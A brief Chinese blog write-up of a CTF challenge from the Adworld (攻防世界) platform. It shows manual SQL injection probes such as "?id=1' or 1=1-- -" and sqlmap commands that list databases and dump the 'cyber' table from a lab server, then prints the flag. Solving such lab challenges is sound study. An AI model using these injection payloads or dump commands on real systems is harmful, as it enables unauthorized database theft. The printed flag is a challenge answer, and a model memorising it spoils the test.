前言
作者简介:不知名白帽,攻防网络安全学习者。世界
博客主页:https://blog.csdn.net/m0_63127854?攻防type=blog
攻防世界专栏:https://blog.csdn.net/m0_63127854/category_11983747.html
网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan
目录
题目场景
尝试SQL注入
尝试sqlmap注入
找到flag
题目场景
尝试SQL注入
?id=1' and 1=1-- -
?id=1' and 1=2-- -
?id=1' or 1=2-- -
都均无回显
?id=1' or 1=1-- -
回显出flag
Please enter ID,and Try to bypass
nice : congratulations
Flag Is : cyberpeace{ 76d13a6f794e1946a69a955eeb3d688d}
尝试sqlmap注入
sqlmap下载地址:http://sqlmap.org
python sqlmap.py -u "http://61.147.171.105:56192/index.php?id=1" -dbs
查看cyber表中数据
python sqlmap.py -u "http://61.147.171.105:56192/index.php?id=1" -T cyber --dump
找到flag
cyberpeace{ 76d13a6f794e1946a69a955eeb3d688d}